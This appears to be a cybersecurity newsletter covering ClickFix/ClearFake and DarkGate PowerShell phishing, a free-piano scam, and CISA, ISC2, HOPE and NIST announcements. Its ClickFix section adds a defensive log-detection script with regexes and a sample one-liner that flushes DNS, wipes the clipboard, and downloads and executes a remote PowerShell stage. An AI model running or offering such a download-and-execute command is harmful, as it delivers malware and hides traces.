PowerShell Scripts Found in Phishing Campaigns

The NJCCIC’s email security solution observed two new phishing campaigns that use PowerShell scripts to drop multiple malicious payloads. One campaign, dubbed ClickFix, was launched by a threat actor identified as TA571, which was also behind the recently observed DarkGate phishing campaign. ClickFix shares many similarities with a second campaign known as ClearFake, and analysts spotted a significant overlap in tactics, techniques, and procedures (TTPs) between the two campaigns.
ClearFake uses a technique called EtherHiding, which uses the blockchain of Binance’s Smart Chain contracts to host a malicious script. This script is injected into compromised websites and loads a second script once a user visits. The secondary script triggers a fake overlay warning to appear, claiming that a root certificate needs to be installed for the website to appear correctly, and includes instructions on how to copy and execute a PowerShell script as a purported solution. If the PowerShell script is executed, the following actions will take place:
  • Flushes the DNS cache.
  • Clears clipboard content to remove traces of the malicious script.
  • Runs a second PowerShell script that downloads Lumma Stealer.
  • Lumma Stealer downloads three additional payloads:
      • Amadey Loader
      • XMRig cryptocurrency miner
      • Clipboard Hijacker
Like ClearFake, the ClickFix campaign begins with an overlay warning on a compromised website stating that a recent browser update was faulty and offers a PowerShell script as a fix. ClickFix was initially observed leading to an infection from a Vidar Stealer payload but has since changed its infection chain, leading to the same payloads as the ClearFake campaign. Researchers are still determining if the threat actors behind the two campaigns work together or if ClearFake replaced the code of the already compromised ClickFix iframes.
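As an added example (not part of the NJCCIC alert), here is a detection heuristic a defender could run over PowerShell Script Block Logging (Event ID 4104) entries to flag the chain described for both ClearFake and ClickFix: a trace-clearing step (DNS flush or clipboard wipe) combined with fetching and executing a second stage. The log entries and the `example.invalid` URLs are constructed for this example, and the regexes and the alerting rule are assumptions, not signatures published in the alert.

```python
import re
from dataclasses import dataclass

# Behaviours the alert attributes to the pasted "fix" script, as (name, regex).
# These patterns are assumptions for this example, not vendor or NJCCIC signatures.
INDICATORS = {
    "dns_flush":      re.compile(r"(?i)\b(ipconfig\s*/flushdns|Clear-DnsClientCache)\b"),
    "clipboard_wipe": re.compile(r"(?i)(Set-Clipboard\s+(-Value\s+)?('{2}|\"{2}|\$null)|Clipboard\]::Clear\b)"),
    "remote_fetch":   re.compile(r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Start-BitsTransfer)\b"),
    "stage_exec":     re.compile(r"(?i)(\bInvoke-Expression\b|\biex\b|\bStart-Process\b|-EncodedCommand|-enc\b)"),
}

@dataclass
class Verdict:
    hits: tuple        # indicator names that matched, in INDICATORS order
    suspicious: bool   # True when the full chain is present

def score_script_block(text: str) -> Verdict:
    """Flag a script block that pairs a trace-clearing step (DNS flush or
    clipboard wipe) with fetching AND executing a second stage. A single
    indicator on its own (e.g. an admin flushing DNS) does not alert."""
    hits = tuple(name for name, rx in INDICATORS.items() if rx.search(text))
    clears_traces = "dns_flush" in hits or "clipboard_wipe" in hits
    stages_payload = "remote_fetch" in hits and "stage_exec" in hits
    return Verdict(hits, clears_traces and stages_payload)

# Constructed ScriptBlockText samples (not real captures).
SAMPLE_SCRIPT_BLOCKS = [
    # Mirrors the chain in the alert: flush DNS, wipe clipboard, fetch and run stage two.
    "ipconfig /flushdns; Set-Clipboard -Value ''; iex (iwr 'https://example.invalid/fix.ps1' -UseBasicParsing).Content",
    # Benign admin activity touching only one indicator: must not alert.
    "Clear-DnsClientCache; Write-Host 'DNS cache cleared'",
    # Legitimate download and launch with no trace-clearing: must not alert.
    "Invoke-WebRequest -Uri 'https://example.invalid/tool.zip' -OutFile tool.zip; Start-Process tool.zip",
]

def triage(blocks):
    """Return the indices of script blocks that match the full chain."""
    return [i for i, b in enumerate(blocks) if score_script_block(b).suspicious]

if __name__ == "__main__":
    for i in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"ALERT block {i}: {score_script_block(SAMPLE_SCRIPT_BLOCKS[i]).hits}")
```

Tune the `stage_exec` and `remote_fetch` patterns to your environment; the point of the rule is the conjunction, which keeps routine DNS or clipboard use from alerting on its own.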
Recommendations
  • Avoid clicking links and opening attachments in unsolicited emails.
  • Confirm requests from senders via contact information obtained from verified and official sources.
  • Type official website URLs into browsers manually.
  • Facilitate user awareness training to include these types of phishing-based techniques.
  • Maintain robust and up-to-date endpoint detection tools on every endpoint.
  • Consider leveraging behavior-based detection tools rather than signature-based tools.
  • Phishing and other malicious cyber activity can be reported to the FBI’s IC3 and the NJCCIC.

Modern Approaches to Network Access Security


The Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with US and international partners, released this joint report urging organizations to move toward more robust security solutions, such as Secure Service Edge (SSE) and Secure Access Service Edge (SASE), that provide greater visibility of network activity. While the report does not cover the planning, architecture, or adoption work needed to shift to these solutions, it does call for organizations to move away from traditional broad remote access deployments and provides best practices for transitioning to modern solutions such as SSE and SASE.

Organizations are encouraged to carefully assess their security posture and perform a risk analysis before implementing any of these solutions to determine whether the approaches fit their organization. Executive leadership, network defenders, and critical infrastructure organizations are given an overview and best practices for primarily cloud-based solutions that can support hybrid and on-premises implementations and incorporate a zero trust approach. The report covers protections for both information technology (IT) and operational technology (OT) networks across a spectrum of network sensitivities and worst-case consequences of compromise.

The report will help organizations better understand the vulnerabilities, threats, and practices associated with traditional remote access and VPN deployment, along with the inherent business risk that remote access misconfiguration poses to an organization’s network. Aligned with CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs), the best practices in the report will also help leaders prioritize the protection of their remote computing environment while operating under the fundamental principle of least privilege.

NJCCIC: Faculty and Students Targeted in Free Instruments Phishing Campaign

Lure email purporting to be giving away a “free” piano. Image Source: Proofpoint 
The NJCCIC recently received reports of a phishing campaign that was also identified by Proofpoint. The campaign involves malicious emails using piano or musical instrument-themed messages to lure people into advance fee fraud (AFF) scams. At least 125,000 messages associated with piano scam campaigns have been identified since January, primarily targeting students and faculty at North American educational facilities. Proofpoint noted that some healthcare and food and beverage organizations were also targeted.
The phishing emails claim that a staff member is giving away a piano and other musical instruments for free due to downsizing or moving. When a target replies, the threat actor instructs them to arrange delivery by contacting a shipping company via a fraudulent email address managed by the threat actors. The “shipping company” then claims they will send the piano if the recipient sends the money for shipping first.
Proofpoint reported that a single Bitcoin wallet address linked to this campaign currently holds over $900,000, although it is unknown if all funds were accumulated from the “free piano” lure. Analysts assess that multiple threat actors are likely conducting different types of scams simultaneously using the same wallet address due to the volume of transactions, variation in transaction prices, and the overall amount of money associated with the account. Proofpoint analysis also revealed that one of the cybercriminals used a Nigerian IP address, suggesting that at least part of the operation is based in Nigeria.

NJCCIC: Phishing for DarkGate

DarkGate has spread through several phishing campaigns, including fake browser updates, the messaging feature in Microsoft Teams, and PDFs containing Google DoubleClick Digital Marketing (DDM) open redirects. The NJCCIC recently reported on a DarkGate campaign exploiting a Windows SmartScreen vulnerability.
The NJCCIC’s email security solution has recently observed multiple attempts to spread DarkGate malware through various phishing campaigns. These emails were flagged as they included newly registered domains and uncommon senders. While the content of the emails varied, they primarily referred to charges and payments due and included malicious HTML attachments. Once opened, a fake Microsoft Word document is loaded, displaying an error message that requests the installation of a root certificate and instructions for remediation. Upon initiating the purported fix, a PowerShell script triggers and installs DarkGate on the user’s device.
A second observed DarkGate campaign used similar phishing emails with malicious HTML attachments; however, once opened, the attachments claimed the user could not connect to Microsoft OneDrive. After clicking the “How to Fix” button, either PowerShell scripts automatically downloaded DarkGate or users were instructed on how to open PowerShell to initiate the “fix” themselves, which initiated the malware download.
Recommendations
  • Avoid clicking links and opening attachments in unsolicited emails.
  • Confirm requests from senders via contact information obtained from verified and official sources.
  • Type official website URLs into browsers manually.
  • Facilitate user awareness training to include these types of phishing-based techniques.
  • Maintain robust and up-to-date endpoint detection tools on every endpoint.
  • Consider leveraging behavior-based detection tools rather than signature-based tools.
  • Phishing and other malicious cyber activity can be reported to the FBI’s IC3 and the NJCCIC.

Free Training: Certified in Cybersecurity (CC) Certification Bootcamp

See yourself in cybersecurity. You don’t need experience — just the passion and drive to enter a demanding and rewarding field, one that opens limitless opportunities worldwide.

As part of our commitment to help close the cybersecurity workforce gap and diversify those working in the field, ISC2 is offering FREE Certified in Cybersecurity (CC) Online Self-Paced Training and exams to one million people.

Start Your Journey
To participate in the One Million Certified in Cybersecurity program, please follow these simple steps:

  1. Create an account. If you already have an ISC2 account, sign in.
  2. Complete your ISC2 Candidate application form and select Certified in Cybersecurity as your certification of interest.
  3. Once the application is complete, you’ll become an ISC2 Candidate. It’s free to join and you’ll gain access to Official ISC2 Certified in Cybersecurity Online Self-Paced Training and the opportunity to register for the free certification exam. You will find your access on the Candidate Benefits page.
  4. Upon passing the exam, complete the application form and pay the U.S. $50 Annual Maintenance Fee (AMF). Once completed, you’ll become a certified member of ISC2 – the world’s largest association of certified cybersecurity professionals – with access to a broad range of professional development resources to help you throughout your career.

Your self-guided tour toward certification — now featuring adaptive learning for a streamlined experience customized to each individual. Leveraging the power of AI, the training guides learners through a self-paced learning experience adapted to their individual needs.

This will be an instructor-led class held on two consecutive Saturdays. Dates: July 20, 27. Time: 8-4. Location: Virtual. The class is offered by the ISC2 NJ chapter. You do not need to be a member, but of course you can join even if you’re not in New Jersey. I will be teaching the class.

Exam included.

  • Pay U.S. $50 Annual Maintenance Fee (AMF) upon passing the certification exam.

Dates: July 20, 27 Time: 8-4 Location: Virtual

Register here: CC Bootcamp Tickets | Eventbrite

HOPE XV: The Fifteenth Hackers On Planet Earth, Queens, NY

HOPE XV will be the fifteenth Hackers On Planet Earth event, held July 12-14, 2024 at St. John’s University in Queens, NY.

This event promises to be memorable. It is open to all hackers, makers, tinkerers, experimenters, artists, educators and anyone else with an interest in exploring and improving the world we live in and sharing knowledge with others.

What you get with your ticket:

  • Three days of amazing in-person content
  • Over 100 presentations
  • Workshops on a variety of topics
  • Performances
  • Hackerspaces with villages, vendors and more
  • Great memories and new acquaintances

Virtual tickets get you all the presentations via livestream, plus access to live chat with other attendees and presenters.

HOPE is an all-ages event with multiple simultaneous sessions and many other things to do throughout the weekend. All of this is in a relaxed and comfortable university environment, with friendly and supportive conference attendees.

Buy tickets 

Hardware Security Failure Scenarios: Potential Weaknesses in Hardware Design | Draft NIST IR 8517 is Available for Comment

NIST Internal Report (IR) 8517, Hardware Security Failure Scenarios: Potential Weaknesses in Hardware Design, is now available for public comment.

There is an incorrect and widespread assumption that hardware is inherently secure. However, this report documents numerous potential security failures that can occur in hardware. It also demonstrates the diverse ways in which hardware can be vulnerable.

The authors leveraged existing work on hardware weaknesses to provide a catalog of 98 security failure scenarios. Each of these is a succinct statement that describes how hardware can be exploited, where such an exploitation can occur, and what kind of damage is possible. This should raise awareness of the many types of hardware security issues that can occur.

The public comment period for this initial public draft is open through July 31, 2024. See the publication details for a copy of the draft and instructions for submitting comments.

NOTE: A call for patent claims is included on page ii of this draft. For additional information, see the Information Technology Laboratory (ITL) Patent Policy – Inclusion of Patents in ITL Publications.

Read More

A Data Protection Approach for Cloud-Native Applications: Draft NIST IR 8505 is Available for Comment

The initial public draft of NIST Internal Report (IR) 8505, A Data Protection Approach for Cloud-Native Applications, is now available for public comment.

Cloud-native applications, which are generally built on a microservices architecture, involve the governance of thousands of services with as many inter-service calls. In this environment, ensuring data security involves more than simply specifying and granting authorization during service requests. It also requires a comprehensive strategy to categorize and analyze data access and leakage as data travels across various protocols (e.g., gRPC, REST-based), especially within ephemeral and scalable microservices implemented as containers.

Hence, in addition to techniques for protecting data at rest (e.g., regular expressions), it has become essential to develop in-transit data categorization that performs real-time data analysis to actively monitor and secure data as it moves across services and network protocols. This IR outlines a practical framework for effective data protection using the capabilities of WebAssembly (WASM) — a platform-agnostic, in-proxy approach with compute and traffic processing capabilities (in-line, network traffic analysis at layers 4–7) that can be built and deployed to execute at native speed in a sandboxed and fault-tolerant manner.

The public comment period for this initial public draft is open through August 1, 2024. See the publication details for a copy of the draft and instructions for submitting comments.

NOTE: A call for patent claims is included on page ii of this draft. For additional information, see the Information Technology Laboratory (ITL) Patent Policy – Inclusion of Patents in ITL Publications.

Read More

NIST Requests Public Comments on SP 800-38B and SP 800-38C | CMAC and CCM Block Cipher Modes of Operation

NIST maintains its cryptography standards and guidelines using a periodic review process.

Currently, we are reviewing the following publications:

  • SP 800-38B, Recommendation for Block Cipher Modes of Operation: The CMAC Mode for Authentication
  • SP 800-38C, Recommendation for Block Cipher Modes of Operation: The CCM Mode for Authentication and Confidentiality

NIST requests feedback on all aspects of these publications. Additionally, NIST would appreciate feedback on the guidance for CMAC and CCM authentication tag lengths. Currently, both publications recommend a minimum tag length of 64 bits.

  • Should these publications require that the authentication tags for CMAC and CCM meet a minimum threshold, such as 64 bits or more?
  • If not, what conditions/requirements on implementations should be specified for the use of shorter authentication tags for CMAC and CCM?

The public comment period is open through September 13, 2024. Comments may address the concerns raised in this announcement or other issues around security, implementation, clarity, risk, or relevance to current applications.

Send comments to cryptopubreviewboard@nist.gov with “Comments on SP 800-38B” or “Comments on SP 800-38C” in the subject.

Comments received in response to this request will be posted on the Crypto Publication Review Project site after the due date. Submitters’ names and affiliations (when provided) will be included, while contact information will be removed. See the project site for additional information about the review process.

Read More